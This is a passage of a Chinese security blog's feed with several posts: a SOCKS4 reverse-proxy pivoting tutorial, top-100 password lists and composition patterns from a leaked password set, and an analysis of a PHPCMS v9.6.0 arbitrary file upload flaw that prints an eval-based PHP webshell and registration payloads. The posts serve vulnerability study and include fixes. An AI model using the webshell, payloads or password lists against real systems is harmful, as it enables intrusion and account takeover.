</code></pre><p>今后访问 <a href="http://x.evilclay.com" target="_blank" rel="external">http://x.evilclay.com</a> 会自动跳转到 <a href="https://x.evilclay.com/，确保所有网站流量走" target="_blank" rel="external">https://x.evilclay.com/，确保所有网站流量走</a> HTTPS 通讯。</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><ol>
<li><a href="https://yundun.console.aliyun.com/" target="_blank" rel="external">https://yundun.console.aliyun.com/</a></li>
<li><a href="https://ninghao.net/blog/4449" target="_blank" rel="external">https://ninghao.net/blog/4449</a></li>
<li><a href="http://blog.csdn.net/trh0123/article/details/70932448" target="_blank" rel="external">http://blog.csdn.net/trh0123/article/details/70932448</a></li>
<li><a href="https://www.howtoing.com/apache-redirect-http-to-https/" target="_blank" rel="external">https://www.howtoing.com/apache-redirect-http-to-https/</a></li>
</ol>
]]></content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;系统环境&quot;&gt;&lt;a href=&quot;#系统环境&quot; class=&quot;headerlink&quot; title=&quot;系统环境&quot;&gt;&lt;/a&gt;系统环境&lt;/h2&gt;&lt;pre&gt;&lt;code&gt;Ubuntu 16.04
Apache2
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&quot;设置域名A记录&quot;&gt;&lt;a 
    
    </summary>
    
    
      <category term="HTTPS" scheme="http://www.evilclay.com/tags/HTTPS/"/>
    
  </entry>
  
  <entry>
    <title>SOCKS4反向代理实验</title>
    <link href="http://www.evilclay.com/2017/06/11/SOCKS4%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86%E5%AE%9E%E9%AA%8C/"/>
    <id>http://www.evilclay.com/2017/06/11/SOCKS4反向代理实验/</id>
    <published>2017-06-11T14:17:30.000Z</published>
    <updated>2017-06-11T14:20:02.465Z</updated>
    
    <content type="html"><![CDATA[<h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>SOCKS4 反向代理是 先在 服务器A （比如攻击机） 上运行 SOCKS4 代理的 服务端程序监听指定端口，然后 在客户机（比如靶机）上运行 客户端程序连接服务器的指定端口。</p>
<p>这样就建立了一条 从 靶机 到攻击机的反向 SOCKS 隧道，攻击机的应用程序（比如 wget nmap curl …）使用该隧道后，程序的所有流量都会先经过靶机转发出去。</p>
<p>接着大家说说相关名词的概念 :P</p>
<p>SOCKS代理：是一种网络协议，主要用于客户端和服务器的中间通讯（并不是我们说的socket套接字）。SOCKS代理工作在比HTTP代理更低的层次，HTTP代理只是将HTTP请求转发到目标HTTP服务器。SOCKS代理可以转发UDP流量和反向代理，HTTP代理不能。</p>
<p>SOCKS代理目前常用 SOCKS4 代理和 SOCKS5 代理两种版本，SOCKS4 只支持 TCP 代理， SOCK5 还支持 UDP代理， 验证 以及 IPv6. [1]</p>
<p>proxychains： Linux下 强制应用程序 使用 Tor， SOCKS4/5代理， HTTP(S) 代理的一款工具。</p>
<p>下面，以 GitHub 上的 <a href="https://github.com/artkond/rpivot" target="_blank" rel="external">https://github.com/artkond/rpivot</a> [2] 项目演示 使用 SOCKS4 反向代理。</p>
<h2 id="服务器监听"><a href="#服务器监听" class="headerlink" title="服务器监听"></a>服务器监听</h2><p>下载  <a href="https://github.com/artkond/rpivot" target="_blank" rel="external">https://github.com/artkond/rpivot</a> 并解压。</p>
<p>运行 server.py 监听本地外网9999端口：</p>
<pre><code>python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080
</code></pre><h2 id="客户机连接"><a href="#客户机连接" class="headerlink" title="客户机连接"></a>客户机连接</h2><p>下载  <a href="https://github.com/artkond/rpivot" target="_blank" rel="external">https://github.com/artkond/rpivot</a> 并解压。</p>
<p>运行 client.py 连接服务器的 9999 端口：</p>
<pre><code>python client.py --server-ip &lt;rpivot_server_ip&gt; --server-port 9999
</code></pre><h2 id="服务器使用代理"><a href="#服务器使用代理" class="headerlink" title="服务器使用代理"></a>服务器使用代理</h2><p>先下载 proxychains 工具：</p>
<pre><code>apt get install proxychains
</code></pre><p>修改配置文件，设置 SOCKS4 代理：</p>
<pre><code>vim /etc/proxychains.conf 
// 添加 socks4 代理
[ProxyList]
socks4 127.0.0.1 1080
</code></pre><p>现在使用 curl 命令不使用 代理请求 ip.cn:</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/socks4/socks4_no.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>对 curl 使用代理后访问 ip.cn:</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/socks4/socks4_yes.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><ol>
<li><a href="https://zh.wikipedia.org/wiki/SOCKS" target="_blank" rel="external">https://zh.wikipedia.org/wiki/SOCKS</a></li>
<li><a href="https://github.com/artkond/rpivot" target="_blank" rel="external">https://github.com/artkond/rpivot</a></li>
</ol>
]]></content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;原理&quot;&gt;&lt;a href=&quot;#原理&quot; class=&quot;headerlink&quot; title=&quot;原理&quot;&gt;&lt;/a&gt;原理&lt;/h2&gt;&lt;p&gt;SOCKS4 反向代理是 先在 服务器A （比如攻击机） 上运行 SOCKS4 代理的 服务端程序监听指定端口，然后 在客户机（比如靶机）上
    
    </summary>
    
    
      <category term="反向代理" scheme="http://www.evilclay.com/tags/%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86/"/>
    
      <category term="SOCKS4" scheme="http://www.evilclay.com/tags/SOCKS4/"/>
    
  </entry>
  
  <entry>
    <title>1.5W条密码样本分析</title>
    <link href="http://www.evilclay.com/2017/06/03/1-5W%E6%9D%A1%E5%AF%86%E7%A0%81%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/"/>
    <id>http://www.evilclay.com/2017/06/03/1-5W条密码样本分析/</id>
    <published>2017-06-02T17:17:25.000Z</published>
    <updated>2017-06-02T17:24:00.679Z</updated>
    
    <content type="html"><![CDATA[<h2 id="引言"><a href="#引言" class="headerlink" title="引言"></a>引言</h2><p>之前对某公开的一段密码库做的一个分析，目的是想得到大家的密码组合规律，无奈一直没用上，在笔记里备份下，以后想针对姓名做组合字典的时候再回头看看。</p>
<p>直接贴出当时的分析结果啦~(≧▽≦)/~</p>
<h2 id="组合规律"><a href="#组合规律" class="headerlink" title="组合规律"></a>组合规律</h2><pre><code>姓 + 6位数字 
8位生日 + 两个字母 
一位字母+123456 
姓名首字母+123 
名拼音+520 
姓拼音+6位生日 
123456+姓名首字母 
姓名首字母+6位数字 
姓名+000 
a+QQ号 
小名(名连读)+1111 
姓+123 
姓名首字母+4位生日年份 
4位生日年份+名拼音 
名拼音+6位生日 
6位数字+姓名首字母 
姓名+4位数字 
姓拼音+生日年份 
姓名首字母+4位生日月份天数 
姓首字母+6位数字 
姓名首字母+1234 
6位生日(月份+1)+名拼音 
qwerty+6538 
姓名首字母+6位生日 
姓名首字母+4位数字 
姓名首字母+123456 
对象姓名首字母+6位生日 
123456+姓 
名+4位数字 
姓名首字母+4位年份+2随机数字 
姓+123123 
名+4位年份 
姓首字母+2位月份+4位年份 
姓+年份最后2位 
姓名首字母+4位年份+ 
1位月份(生日-1)+1位天数 
姓名首字母+4位年份+2位月份 
6位对象生日+姓名首字母 
姓首字母+名+生日年份 
对象首字母+520 
2个字母+123321 
对象首字母+8位生日 
对象首字母+520520 
520+对象首字母 
姓+258369
</code></pre><h2 id="TOP-20"><a href="#TOP-20" class="headerlink" title="TOP 20"></a>TOP 20</h2><pre><code>a123456
qwe123456
qwe123
asd123456
123456a
qq123456
asd123
qwer1234
123456AA
aaa123456
a123123
qaz123
aa123456
123123aa
abcd1234
a123456789
a112233
woaini1314
123QWE
qwe123123
</code></pre><h2 id="TOP-50"><a href="#TOP-50" class="headerlink" title="TOP 50"></a>TOP 50</h2><pre><code>a123456
qwe123456
qwe123
asd123456
123456a
qq123456
asd123
qwer1234
123456AA
aaa123456
a123123
qaz123
aa123456
123123aa
abcd1234
a123456789
a112233
woaini1314
123QWE
qwe123123
aa123123
q123456
y123456
qaz123456
z123456
aini1314
a1234567
w123456
woaini520
1234qwer
qq112233
zj5201314
abc123456
qq111111
a2329765
love1314
a111111
a147258
woaini123
123123a
a123456a
wu123456
asdf1234
qqq111
zxcvbnm123
ll123456
123456asd
li123456
123456z
a12345
</code></pre><h2 id="TOP-100"><a href="#TOP-100" class="headerlink" title="TOP 100"></a>TOP 100</h2><pre><code>a123456
qwe123456
qwe123
asd123456
123456a
qq123456
asd123
qwer1234
123456AA
aaa123456
a123123
qaz123
aa123456
123123aa
abcd1234
a123456789
a112233
woaini1314
123QWE
qwe123123
aa123123
q123456
y123456
qaz123456
z123456
aini1314
a1234567
w123456
woaini520
1234qwer
qq112233
zj5201314
abc123456
qq111111
a2329765
love1314
a111111
a147258
woaini123
123123a
a123456a
wu123456
asdf1234
zxcvbnm123
ll123456
123456asd
li123456
123456z
a12345
aa000000
aaa123123
qq123123
qqq111
a5201314
zhang123
aaa123789
a1314520
yang1314
zxc123456
liushu123
zhang520
qweqwe123
zx123456
li5201314
aaa111
xiao520
xiang520
w123456789
liu6577453
zhang1314
wang12345
zhong123
ws640805
hh124124
nn23456
x891104
c123456
qwe12345
159951a
z520520
hai520
qqww1122
qwe112233
1995312w
b123456
bb5201314
qqq123
qwe123355
zy584520
mima123
cwt123456
zhuzhu520
pmwdea58
peng1989
LMJ831023
chm420924
123456qq
123qaz
woaini8023
zhou123
</code></pre>]]></content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;引言&quot;&gt;&lt;a href=&quot;#引言&quot; class=&quot;headerlink&quot; title=&quot;引言&quot;&gt;&lt;/a&gt;引言&lt;/h2&gt;&lt;p&gt;之前对某公开的一段密码库做的一个分析，目的是想得到大家的密码组合规律，无奈一直没用上，在笔记里备份下，以后想针对姓名做组合字典的时候再回头看
    
    </summary>
    
    
      <category term="密码规律" scheme="http://www.evilclay.com/tags/%E5%AF%86%E7%A0%81%E8%A7%84%E5%BE%8B/"/>
    
  </entry>
  
  <entry>
    <title>PHPCMSv9.6.0任意文件上传漏洞分析</title>
    <link href="http://www.evilclay.com/2017/05/10/PHPCMSv9-6-0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/"/>
    <id>http://www.evilclay.com/2017/05/10/PHPCMSv9-6-0任意文件上传漏洞分析/</id>
    <published>2017-05-09T18:57:49.000Z</published>
    <updated>2017-05-09T19:07:45.196Z</updated>
    
    <content type="html"><![CDATA[<h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h2><p>本次漏洞产生的原因是因为PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的效验导致可以下载PHP脚本，同时下载之后的文件名可以使用暴力破解的方式或者是数据库插入报错的形式获得，所以把预先准备好的一句话木马下载到服务器上，最后使用客户端连接拿到shell。</p>
<h2 id="漏洞点"><a href="#漏洞点" class="headerlink" title="漏洞点"></a>漏洞点</h2><p>漏洞存在于 \phpcmsv9.6.0\phpcms\libs\classes\attachment.class.php 的 download 函数，这是一个附件下载的函数：</p>
<pre><code>/**
 * 附件下载
 * Enter description here ...
 * @param $field 预留字段
 * @param $value 传入下载内容
 * @param $watermark 是否加入水印
 * @param $ext 下载扩展名
 * @param $absurl 绝对路径
 * @param $basehref 
 */
function download($field, $value,$watermark = &apos;0&apos;,$ext = &apos;gif|jpg|jpeg|bmp|png&apos;, $absurl = &apos;&apos;, $basehref = &apos;&apos;)
{
    global $image_d;
    $this-&gt;att_db = pc_base::load_model(&apos;attachment_model&apos;);
    $upload_url = pc_base::load_config(&apos;system&apos;,&apos;upload_url&apos;);
    $this-&gt;field = $field;
    $dir = date(&apos;Y/md/&apos;);
    $uploadpath = $upload_url.$dir;
    $uploaddir = $this-&gt;upload_root.$dir;
    $string = new_stripslashes($value);
    if(!preg_match_all(&quot;/(href|src)=([\&quot;|&apos;]?)([^ \&quot;&apos;&gt;]+\.($ext))\\2/i&quot;, $string, $matches)) return $value;
    $remotefileurls = array();
    foreach($matches[3] as $matche)
    {
        if(strpos($matche, &apos;://&apos;) === false) continue;
        dir_create($uploaddir);
        $remotefileurls[$matche] = $this-&gt;fillurl($matche, $absurl, $basehref);
    }
    unset($matches, $string);
    $remotefileurls = array_unique($remotefileurls);
    $oldpath = $newpath = array();
    foreach($remotefileurls as $k=&gt;$file) {
        if(strpos($file, &apos;://&apos;) === false || strpos($file, $upload_url) !== false) continue;
        $filename = fileext($file);
        $file_name = basename($file);
        $filename = $this-&gt;getname($filename);

        $newfile = $uploaddir.$filename;
        $upload_func = $this-&gt;upload_func;
        if($upload_func($file, $newfile)) {
            $oldpath[] = $k;
            $GLOBALS[&apos;downloadfiles&apos;][] = $newpath[] = $uploadpath.$filename;
            @chmod($newfile, 0777);
            $fileext = fileext($filename);
            if($watermark){
                watermark($newfile, $newfile,$this-&gt;siteid);
            }
            $filepath = $dir.$filename;
            $downloadedfile = array(&apos;filename&apos;=&gt;$filename, &apos;filepath&apos;=&gt;$filepath, &apos;filesize&apos;=&gt;filesize($newfile), &apos;fileext&apos;=&gt;$fileext);
            $aid = $this-&gt;add($downloadedfile);
            $this-&gt;downloadedfiles[$aid] = $filepath;
        }
    }
    return str_replace($oldpath, $newpath, $value);
}
</code></pre><p>待下载的附件$value 首先经过 new_stripslashes 处理：</p>
<pre><code>/**
 * 返回经stripslashes处理过的字符串或数组
 * @param $string 需要处理的字符串或数组
 * @return mixed
 */
function new_stripslashes($string) {
    if(!is_array($string)) return stripslashes($string);
    foreach($string as $key =&gt; $val) $string[$key] = new_stripslashes($val);
    return $string;
}
</code></pre><p>这一步是删除由 addslashes() 函数添加的反斜杠 的字符串或数组。</p>
<p>然后对下载地址进行一次正则匹配：</p>
<pre><code>preg_match_all(&quot;/(href|src)=([\&quot;|&apos;]?)([^ \&quot;&apos;&gt;]+\.($ext))\\2/i&quot;, $string, $matches)
</code></pre><p>由于 $ext = ‘gif|jpg|jpeg|bmp|png’ 所以这里可以匹配的URL只需要满足 类似 src=”<a href="http://xxx/xxx.jpg" target="_blank" rel="external">http://xxx/xxx.jpg</a>“ 的形式即可。</p>
<p>经过正则匹配后 $matches[3] 的每个元素链接了 <a href="http://xxx/xxx.jpg" target="_blank" rel="external">http://xxx/xxx.jpg</a> 的形式，在这里可以说对后缀名进行了一次验证，但这种验证的方式有问题，</p>
<p>由于没有考虑到 URL 中的 ? 和 # 的特殊性，所以这里验证的文件后缀名并不是真正的文件后缀。</p>
<p>比如，一个 百度的地址是 <a href="https://www.baidu.com/index.php，" target="_blank" rel="external">https://www.baidu.com/index.php，</a> 使用 <a href="https://www.baidu.com/index.php?1.jpg" target="_blank" rel="external">https://www.baidu.com/index.php?1.jpg</a> 或者 <a href="https://www.baidu.com/index.php#1.jpg" target="_blank" rel="external">https://www.baidu.com/index.php#1.jpg</a> 都可以访问。</p>
<p>接着进入对 URL 进行补全的逻辑代码：</p>
<pre><code>$remotefileurls[$matche] = $this-&gt;fillurl($matche, $absurl, $basehref);
</code></pre><p>重点是 fillurl 函数的这段代码：</p>
<pre><code>$pos = strpos($surl,&apos;#&apos;);
if($pos&gt;0) $surl = substr($surl,0,$pos);
</code></pre><p>直接把url中包含 # 符号及之后的字符串全部都清掉。配合之前的正则匹配成功的bypass了一次图片后缀名验证。</p>
<p>比如我们的 URL 地址设置为： <a href="http://www.foo.com/1.txt?1.php#1.jpg" target="_blank" rel="external">http://www.foo.com/1.txt?1.php#1.jpg</a></p>
<p>去掉 # 之后就是 <a href="http://www.foo.com/1.txt?1.php" target="_blank" rel="external">http://www.foo.com/1.txt?1.php</a></p>
<p>在 fillurl 中后面就是无关紧要的 return 操作了，我们继续。</p>
<p>下面有一次获取文件后缀名和生成文件名的操作。</p>
<pre><code>$filename = fileext($file);
$filename = $this-&gt;getname($filename);
</code></pre><p>我们追踪 fileext函数：</p>
<pre><code>function fileext($filename) {
    return strtolower(trim(substr(strrchr($filename, &apos;.&apos;), 1, 10)));  
}
</code></pre><p>strrchr 查找字符串在 另一个字符串中最后一次出现的位置，并返回从该位置到字符串结尾的所有字符。</p>
<p>也就是说此时 URL（<a href="http://www.foo.com/1.txt?1.php）" target="_blank" rel="external">http://www.foo.com/1.txt?1.php）</a> 的文件后缀名已经是 php 了。</p>
<p>追踪 getname 函数，可见最终生成的文件名是 “年月日时分秒+三位随机数字+ ‘.’ + 文件扩展名（php）”。</p>
<pre><code>function getname($fileext){
    return date(&apos;Ymdhis&apos;).rand(100, 999).&apos;.&apos;.$fileext;
}
</code></pre><p>最后 使用 upload_func 函数对 <a href="http://www.foo.com/1.txt?1.php" target="_blank" rel="external">http://www.foo.com/1.txt?1.php</a> 处理，</p>
<p>通过 $this-&gt;upload_func = ‘copy’; 可以得到 upload_func 实际上就是 PHP 自带的 copy 下载函数。</p>
<p>至此 已经在服务器上成功上传了可以获知文件位置的一句话木马。</p>
<p>其实远程URL的地址也可以使用 <a href="http://www.foo.com/1.php#1.jpg" target="_blank" rel="external">http://www.foo.com/1.php#1.jpg</a> 的形式，只要保证直接访问 1.php 文件能输入 一句话木马代码就行，</p>
<p>比如 1.php 的 代码如下：</p>
<pre><code>&lt;?php
    echo &apos;&lt;?php @eval($_POST[a]);?&gt;&apos;;
?&gt;
</code></pre><p>burp 抓包上传成功：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/phpcmsv9.6.0/demo3.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>上传的文件内容：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/phpcmsv9.6.0/res.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<h2 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h2><p>知道了 download 是漏洞点，所以可以直接搜索有哪些地方调用了 download 函数，只要调用了 download 函数都可能会出现这个问题。</p>
<p>搜索项目发现下面几个文件存在 直接调用：</p>
<pre><code>python find.py -k download(
[-] filename :./caches\caches_model\caches_data\content_input.class.php
[-] filename :./caches\caches_model\caches_data\member_input.class.php
[-] filename :./phpcms\libs\classes\attachment.class.php
[-] filename :./phpcms\modules\collection\classes\collection.class.php
[-] filename :./phpcms\modules\content\down.php
[-] filename :./phpcms\modules\content\fields\editor\input.inc.php
[-] filename :./phpcms\modules\formguide\fields\editor\input.inc.php
[-] filename :./phpcms\modules\member\fields\editor\input.inc.php
</code></pre><p>打开 content_input.class.php  发现是在editor进行的调用：</p>
<pre><code>function editor($field, $value) {
    $setting = string2array($this-&gt;fields[$field][&apos;setting&apos;]);
    $enablesaveimage = $setting[&apos;enablesaveimage&apos;];
    if(isset($_POST[&apos;spider_img&apos;])) $enablesaveimage = 0;
    if($enablesaveimage) {
        $site_setting = string2array($this-&gt;site_config[&apos;setting&apos;]);
        $watermark_enable = intval($site_setting[&apos;watermark_enable&apos;]);
        $value = $this-&gt;attachment-&gt;download(&apos;content&apos;, $value,$watermark_enable);
    }
    return $value;
}
</code></pre><p>所以调用 editor 函数的地方也会出现这个问题，当然可以直接静态搜索”editor(“得到调用他的函数，结果发现很多调用。</p>
<pre><code>python find.py -k editor(
[-] filename :./caches\caches_model\caches_data\content_form.class.php
[-] filename :./caches\caches_model\caches_data\content_input.class.php
[-] filename :./caches\caches_model\caches_data\content_output.class.php
......
</code></pre><p>有时间的话可以一个个的往前溯源，一直溯源到用户可以控制的参数为止。</p>
<p>在这里根据先前提供的PoC直接看用户注册相关代码：</p>
<p>\phpcmsv9.6.0\phpcms\modules\member\index.php 的 register 函数</p>
<pre><code>//附表信息验证 通过模型获取会员信息
if($member_setting[&apos;choosemodel&apos;]) {
    require_once CACHE_MODEL_PATH.&apos;member_input.class.php&apos;;
    require_once CACHE_MODEL_PATH.&apos;member_update.class.php&apos;;
    $member_input = new member_input($userinfo[&apos;modelid&apos;]);        
    $_POST[&apos;info&apos;] = array_map(&apos;new_html_special_chars&apos;,$_POST[&apos;info&apos;]);
    $user_model_info = $member_input-&gt;get($_POST[&apos;info&apos;]);                                        
}
</code></pre><p>最后一行调用了 \phpcmsv9.6.0\caches\caches_model\caches_data\member_input.class.php 的 get () 函数</p>
<p>get 函数包含：</p>
<pre><code>$func = $this-&gt;fields[$field][&apos;formtype&apos;];
if(method_exists($this, $func)) $value = $this-&gt;$func($field, $value);
</code></pre><p>先看一下 $this-&gt;fields 的定义：</p>
<pre><code>$this-&gt;fields = getcache(&apos;model_field_&apos;.$modelid,&apos;model&apos;);
</code></pre><p>需要从缓存的模型里获得 fields 字段，一共有 5 个 模型文件；</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/phpcmsv9.6.0/models.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>只要从中有一个可以 $this-&gt;fields[$field][‘formtype’] 的结果是 editor 就可以。</p>
<p>model_field_11.cache 是可以的，需要把info数组设置成 content 索引，也就是我们的payload 中 包含：</p>
<pre><code>modelid=11&amp;info[content]=&lt;img href=http://localhost/cms/phpcmsv9.6.0/2.php#.jpg&gt;
</code></pre><p>或者下面这些 payload 都是可以的。</p>
<pre><code>modelid=1&amp;info[content]=&lt;img href=http://localhost/cms/phpcmsv9.6.0/2.php#.jpg&gt;
modelid=2&amp;info[content]=&lt;img href=http://localhost/cms/phpcmsv9.6.0/2.php#.jpg&gt;
modelid=3&amp;info[content]=&lt;img href=http://localhost/cms/phpcmsv9.6.0/2.php#.jpg&gt;
</code></pre><p>当 $this-&gt;fields[$field][‘formtype’] 的值是 editor 后，可以看到 editor 函数调用了 attachment.class.php 的download 函数，所以注册存在任意文件上传漏洞。</p>
<pre><code>function editor($field, $value) {
    $setting = string2array($this-&gt;fields[$field][&apos;setting&apos;]);
    $enablesaveimage = $setting[&apos;enablesaveimage&apos;];
    $site_setting = string2array($this-&gt;site_config[&apos;setting&apos;]);
    $watermark_enable = intval($site_setting[&apos;watermark_enable&apos;]);
    $value = $this-&gt;attachment-&gt;download(&apos;content&apos;, $value,$watermark_enable);
    return $value;
}
</code></pre><h2 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h2><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/phpcmsv9.6.0/demo1.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>或者</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/phpcmsv9.6.0/demo2.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<h2 id="修复"><a href="#修复" class="headerlink" title="修复"></a>修复</h2><p>说说几种修复的方案：</p>
<pre><code>1. 对最后生成的文件名的后缀进行一次白名单过滤。（ v9.6.1更新官方做法 ）
2. 干掉上传文件路径的可执行权限。（不建议，配合文件包含漏洞会GG）
3. 增加文件重命名的随机字符长度。（也不建议，需要确保上传的图片用户不能访问）
</code></pre><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这个漏洞点是文件下载点触发的，当然以后可能是上传点，与数据库交互的参数，用户控制的参数 …<br>想到一点，关于使用关键字搜索函数调用这种审计方法有点low啊，这篇文章中的最后用到的是动态调用 editor 函数的方法找到的关联。<br>所以静态分析进行不下去了，多看看代码的逻辑关系，毕竟代码越多，漏洞越多嘛。<br>最后，这是我的第一篇 PHP 的代码审计文章，参考了一些大牛的分析文章，感谢~<br>希望自己有机会多写写，漏洞再多，选择自己感兴趣的分析分析。</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a href="http://paper.seebug.org/273/" target="_blank" rel="external">http://paper.seebug.org/273/</a></p>
<p>还有一位DALAO的文档 :P</p>
]]></content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;漏洞描述&quot;&gt;&lt;a href=&quot;#漏洞描述&quot; class=&quot;headerlink&quot; title=&quot;漏洞描述&quot;&gt;&lt;/a&gt;漏洞描述&lt;/h2&gt;&lt;p&gt;本次漏洞产生的原因是因为PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的效验导致可以下载PHP脚本，同时下载之
    
    </summary>
    
    
      <category term="PHPCMS" scheme="http://www.evilclay.com/tags/PHPCMS/"/>
    
      <category term="代码审计" scheme="http://www.evilclay.com/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
    
      <category term="任意文件上传" scheme="http://www.evilclay.com/tags/%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/"/>
    
  </entry>
  
  <entry>
    <title>VSCode配置PHP动态调试环境</title>
    <link href="http://www.evilclay.com/2017/05/09/VSCode%E9%85%8D%E7%BD%AEPHP%E5%8A%A8%E6%80%81%E8%B0%83%E8%AF%95%E7%8E%AF%E5%A2%83/"/>
    <id>http://www.evilclay.com/2017/05/09/VSCode配置PHP动态调试环境/</id>
    <published>2017-05-09T05:38:58.000Z</published>
    <updated>2017-05-09T06:05:43.377Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>首先 PHP 需要安装 XDebug 扩展，然后在 php 配置文件中启用该扩展，然后 在 VSCode 中安装  php-debug 扩展，并做响应的配置就可以直接在 VSCode 中对 PHP 代码进行动态调试。</p>
<p>XDebug 扩展就是一个 dll 文件，用来对PHP代码进行调试分析，一些 WAMP 中已经包含了该文件，只需要手动启用即可。</p>
<p>php-debug 是 VSCode 的扩展应用，直接在 VSCode 中可到看到它是一个VS代码和XDebug之间的调试适配器。</p>
<h2 id="安装配置-XDebug"><a href="#安装配置-XDebug" class="headerlink" title="安装配置 XDebug"></a>安装配置 XDebug</h2><p>PHPStudy 中 XDebug文件 已经集成在环境中，只需要修改 php.ini 成如下配置：</p>
<pre><code>zend_extension=&quot;...\ext\xdebug.dll&quot;  // 这里是xdebug.dll的绝对路径
xdebug.remote_enable = 1
xdebug.remote_autostart=1
</code></pre><p>若没有继承 xdebug.dll 文件，可以根据 php 版本在 <a href="https://xdebug.org/download.php" target="_blank" rel="external">https://xdebug.org/download.php</a> 下载对应 扩展。之后重启 Apache 环境是配置生效。</p>
<h2 id="VSCode-扩展安装"><a href="#VSCode-扩展安装" class="headerlink" title="VSCode 扩展安装"></a>VSCode 扩展安装</h2><p>按 F1 输入 ext install php-debug 安装扩展应用。</p>
<p>安装完成后，新建 php 测试文件如下：</p>
<pre><code>&lt;?php
    echo &quot;PHP动态调试测试&quot;;

    $name = &apos;Anka9080&apos;;

    echo &quot;这是断点之后的内容&quot;;

    echo phpinfo();

?&gt;
</code></pre><p>若提示不解析 php 代码, 需要对项目设置指定 PHP 程序路径，</p>
<p>文件 —— 首选项 —— 设置， 再右侧用户设置添加：</p>
<pre><code>// 将设置放入此文件中以覆盖默认设置
{
    &quot;php.validate.executablePath&quot;: &quot;..../php53/php.exe&quot;  // php 程序的路径
}
</code></pre><p>之后在 VSCode 调试模块选用 Xdebug 调试器，如下配置：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/phpdebug/phpd1.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
<p>重启 VSCode 使 配置生效。</p>
<h2 id="测试"><a href="#测试" class="headerlink" title="测试"></a>测试</h2><p>使用 VSCode 打开 test.php，鼠标左键下红色断点，然后直接 F5 开启调试模式，然后 用浏览器访问 test.php 文件，结果如下：</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="http://7xku36.com1.z0.glb.clouddn.com/phpdebug/phpd2.png" alt="" title="">
                </div>
                <div class="image-caption"></div>
            </figure>
]]></content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;简介&quot;&gt;&lt;a href=&quot;#简介&quot; class=&quot;headerlink&quot; title=&quot;简介&quot;&gt;&lt;/a&gt;简介&lt;/h2&gt;&lt;p&gt;首先 PHP 需要安装 XDebug 扩展，然后在 php 配置文件中启用该扩展，然后 在 VSCode 中安装  php-debug 扩展
    
    </summary>
    
    
      <category term="代码审计" scheme="http://www.evilclay.com/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
    
      <category term="PHP" scheme="http://www.evilclay.com/tags/PHP/"/>
    
      <category term="动态调试" scheme="http://www.evilclay.com/tags/%E5%8A%A8%E6%80%81%E8%B0%83%E8%AF%95/"/>
    
  </entry>
  
  <entry>
    <title>漏洞环境搭建之DockerCompose学习</title>
    <link href="http://www.evilclay.com/2017/04/28/%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA%E4%B9%8BDockerCompose%E5%AD%A6%E4%B9%A0/"/>
    <id>http://www.evilclay.com/2017/04/28/漏洞环境搭建之DockerCompose学习/</id>
    <published>2017-04-28T03:45:59.000Z</published>
    <updated>2017-04-28T03:47:18.014Z</updated>
    
